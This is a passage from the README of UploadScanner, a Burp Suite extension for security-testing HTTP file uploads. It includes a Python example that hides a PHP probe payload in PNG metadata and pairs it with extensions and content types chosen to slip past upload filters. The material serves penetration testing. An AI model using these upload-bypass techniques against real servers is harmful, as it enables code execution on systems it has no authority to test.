# UploadScanner Burp extension
A Burp Suite Pro extension to do security tests for HTTP file uploads.
**Table of Contents**
<!-- Table of contents generated by http://tableofcontent.eu -->
- [Abstract](#abstract)
- [Main feature](#main-feature)
- [Installation](#installation)
- [Tutorials](#tutorials)
- [About](#about)
- [Background information and FAQ](#background-information-and-faq)
- [TL;DR and important infos](#tldr-and-important-infos)
- [Basics](#basics)
- [Checklist](#checklist)
- [I broke the website, omg, what did I do?](#i-broke-the-website-omg-what-did-i-do)
- [Limitations](#limitations)
- [Detecting issues](#detecting-issues)
- [Detecting successful uploads](#detecting-successful-uploads)
- [FlexiInjector - Detecting requests with uploads](#flexiinjector-detecting-requests-with-uploads)
- [Image Formating options](#image-formating-options)
- [ReDownloader](#redownloader)
- [Testing and trophy case](#testing-and-trophy-case)
- [Explanation for UI configuration options](#explanation-for-ui-configuration-options)
- [Modules](#modules)
- [Active Scan module](#active-scan-module)
- [Imagetragick module](#imagetragick-module)
- [Imagemagick/Graphicsmagick module](#imagemagickgraphicsmagick-module)
- [Ghostscript module](#ghostscript-module)
- [LibAvFormat module](#libavformat-module)
- [PHP code module](#php-code-module)
- [JSP code module](#jsp-code-module)
- [ASP code module](#asp-code-module)
- [.htaccess/web.config module](#htaccesswebconfig-module)
- [CGI module](#cgi-module)
- [Server Side Include (SSI) module](#server-side-include-ssi-module)
- [XXE module](#xxe-module)
- [XSS module](#xss-module)
- [Eicar module](#eicar-module)
- [PDF module](#pdf-module)
- [Other SSRF module](#other-ssrf-module)
- [CSV/spreadsheet module](#csvspreadsheet-module)
- [Path traversal module](#path-traversal-module)
- [Polyglot module](#polyglot-module)
- [Fingerping module](#fingerping-module)
- [Quirks module](#quirks-module)
- [Generic URL replacer module](#generic-url-replacer-module)
- [Recursive uploader module](#recursive-uploader-module)
- [Fuzzer module](#fuzzer-module)
- [Timeout and DoS module](#timeout-and-dos-module)
- [File formats](#file-formats)
- [General options](#general-options)
- [Delete project settings on reload](#delete-project-settings-on-reload)
- [Name of exiftool executable](#name-of-exiftool-executable)
- [Throttle between requests in seconds](#throttle-between-requests-in-seconds)
- [Sleep time for sleep payloads in seconds](#sleep-time-for-sleep-payloads-in-seconds)
- [Create log (see "Done uploads" tab)](#create-log-see-done-uploads-tab)
- [Replace filename in requests](#replace-filename-in-requests)
- [Replace content type in requests](#replace-content-type-in-requests)
- [Replace file size in requests](#replace-file-size-in-requests)
- [Enable wget/curl/rundll payloads (default: only nslookup)](#enable-wgetcurlrundll-payloads-default-only-nslookup)
- [FlexiInjector options](#flexiinjector-options)
- [Choose file you uploaded](#choose-file-you-uploaded)
- [Mime type of that file](#mime-type-of-that-file)
- [Image formating options](#image-formating-options)
- [ReDownloader parsing options](#redownloader-parsing-options)
- [Parse other response (preflight request)](#parse-other-response-preflight-request)
- [1. Start marker to parse URL from response](#1-start-marker-to-parse-url-from-response)
- [1. End marker to parse URL from response](#1-end-marker-to-parse-url-from-response)
- [Replace \/ with / in parsed content](#replace-with-in-parsed-content)
- [Additional URL prefix for parsed part](#additional-url-prefix-for-parsed-part)
- [Additional URL suffix for parsed part](#additional-url-suffix-for-parsed-part)
- [2. Alternatively, a static URL](#2-alternatively-a-static-url)
- [Recursive uploader module options](#recursive-uploader-module-options)
- [Fuzzer module options](#fuzzer-module-options)
## Abstract
Testing web applications is a standard task for every security analyst. Various automated and semi-automated security testing tools exist to simplify the task. HTTP-based file uploads are one specialised use case. However, most automated web application security scanners do not adapt their attacks when they encounter a file upload and are therefore likely to miss vulnerabilities related to file upload functionality.
While many of the techniques used for file upload testing are documented throughout the web, the code necessary to automate such attacks is often missing. In other cases, the techniques only apply to very specific use cases. One of the goals of this research was to generalise and automate these attacks. The attack techniques include generic attacks such as Cross-Site Scripting (XSS), XML External Entity injection (XXE) and PHP/JSP/ASP code injection, but the goal is to execute these attacks customised for the use case of HTTP-based file uploads. Additionally, more specific attacks on server-side parsers are used as an attack vector, for example Server Side Request Forgery (SSRF) through m3u8 playlist files being parsed with LibAv.
File uploads on websites are an underestimated area for security testing. The attack surface of a server that parses files is automatically a lot bigger. While some of the issues that can occur get very high attention (e.g. the [ImageTragick](https://imagetragick.com/) vulnerability), countless memory corruption bugs get fixed every day in various parsers that might also be in use on your web server. And while your REST XML web service might not be vulnerable to XML External Entity (XXE) injection, that doesn't mean your image parser has no XXE issue when it reads JPEG XMP metadata (which is XML).
Various techniques are necessary to successfully upload a file, including correlating file extensions, content types and content. Moreover, the file content has to pass server-side checks or survive modifications such as image size requirements or resizing operations. Circumventing processing on the server side, creating content that survives the modification, or creating content that only turns into the desired payload after the modification is another goal of this extension.
While a couple of Burp extensions already do some checks, this extension tries to implement most attacks that seem feasible for file uploads. The extension is divided into modules; each module handles several attacks of the same category.
## Main feature
While the extension has many interesting features across its modules, the main workflow is:
1. Take a small gif, png, jpeg, tiff, pdf, zip or mp4 file
2. If it's an image, resize the image (sizes are UI options)
3. If it's an image, give it a random new colour
4. If the file format supports it, use the exiftool metadata techniques "keywords", "comment", "iptc:keywords", "xmp:keywords", "exif:ImageDescription" and "ThumbnailImage" ...
5. ... to inject PHP, JSP, ASP, XXE, SSRF, XSS and SSI payloads ...
6. ... then upload with various combinations of file extensions and content types ...
7. ... to detect issues via sleep-based payloads, Burp Collaborator interactions or by downloading the file again
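The workflow above, condensed into a stand-alone example. This is added illustration code, not UploadScanner's own implementation: instead of calling exiftool it writes the payload directly into a PNG `tEXt` chunk (the equivalent of the "comment" technique), enumerates an assumed, abbreviated list of extension and content-type combinations, builds the multipart part for each, and then performs the ReDownloader-style check of whether the injected bytes survived. A `strip_text_chunks` helper stands in for a server that resizes or re-encodes the image, which is the common reason a metadata payload does not survive. The probe payload, extension list and content-type list are constructed for this example.

```python
"""Added example (not UploadScanner's own code): build a small PNG carrying an
injected payload in its metadata, enumerate filename/content-type combinations
for the upload, and check whether the payload survived server-side processing
by re-parsing the (re)downloaded file."""
import itertools
import struct
import zlib

# Constructed probe payload; UploadScanner ships its own payload sets.
PHP_PAYLOAD = b"<?php echo 'uploadscanner-probe'; ?>"

# Assumed, abbreviated lists of extensions and content types to combine.
EXTENSIONS = ["php", "php.png", "png.php", "phtml"]
CONTENT_TYPES = ["image/png", "application/x-php", "application/octet-stream"]

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png_with_text(keyword: bytes, text: bytes, width: int = 4, height: int = 4,
                       rgb=(0x12, 0x34, 0x56)) -> bytes:
    """Minimal valid 8-bit RGB PNG with `text` stored in a tEXt chunk.

    Writing the tEXt chunk by hand stands in for the extension's exiftool
    '-comment=' / '-keywords=' techniques; `rgb` plays the "random new colour".
    """
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # 8-bit, colour type 2 (RGB)
    row = b"\x00" + bytes(rgb) * width  # filter type 0 followed by solid-colour pixels
    idat = zlib.compress(row * height)
    return (PNG_SIG
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", keyword + b"\x00" + text)
            + png_chunk(b"IDAT", idat)
            + png_chunk(b"IEND", b""))


def parse_png_chunks(png: bytes):
    """Return [(type, data), ...] after verifying the signature and every CRC."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if crc != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        chunks.append((ctype, data))
        pos += 12 + length
    return chunks


def strip_text_chunks(png: bytes) -> bytes:
    """Simulate a server that re-encodes the image and drops the ancillary
    text chunks, which is what a resize with most image libraries does."""
    kept = [(t, d) for t, d in parse_png_chunks(png)
            if t not in (b"tEXt", b"zTXt", b"iTXt")]
    return PNG_SIG + b"".join(png_chunk(t, d) for t, d in kept)


def upload_variants(base_name: str):
    """Yield every (filename, content_type) combination to send, scanner-style."""
    for ext, ctype in itertools.product(EXTENSIONS, CONTENT_TYPES):
        yield f"{base_name}.{ext}", ctype


def multipart_body(filename: str, content_type: str, data: bytes,
                   boundary: str = "----UploadScannerExample") -> bytes:
    """One multipart/form-data body with the chosen filename and Content-Type."""
    head = (f"--{boundary}\r\n"
            f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
            f"Content-Type: {content_type}\r\n\r\n").encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def payload_survived(downloaded: bytes, payload: bytes = PHP_PAYLOAD) -> bool:
    """ReDownloader-style check: are the injected bytes still in the stored file?"""
    return payload in downloaded


if __name__ == "__main__":
    probe = make_png_with_text(b"Comment", PHP_PAYLOAD)
    for fname, ctype in upload_variants("avatar"):
        body = multipart_body(fname, ctype, probe)
        # send `body` as the request body via Burp or an HTTP client here (omitted to stay offline)
    print("payload kept by a raw copy:", payload_survived(probe))
    print("payload kept after re-encode:", payload_survived(strip_text_chunks(probe)))
```

The two final checks are the point of the exercise: a server that stores the upload byte-for-byte keeps the payload, a server that re-encodes the image (the `strip_text_chunks` simulation) does not, and only a download of the stored file tells you which happened. Sleep-based and Collaborator-based detection cover the cases where you cannot download the file again.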
## Installation
[UploadScanner.py](UploadScanner.py) is the file you need to import into Burp, see [Portswigger's support page on how to install an extension](https://support.portswigger.net/customer/portal/articles/1965930-how-to-install-an-extension-in-burp-suite).
After installing the extension, check the "Global & Active Scanning configuration" tab of the extension. If a field is marked red, there is an error.
## Tutorials
There are several tutorial videos available for the different topics that will help you get started. The UI of the extension changed a little since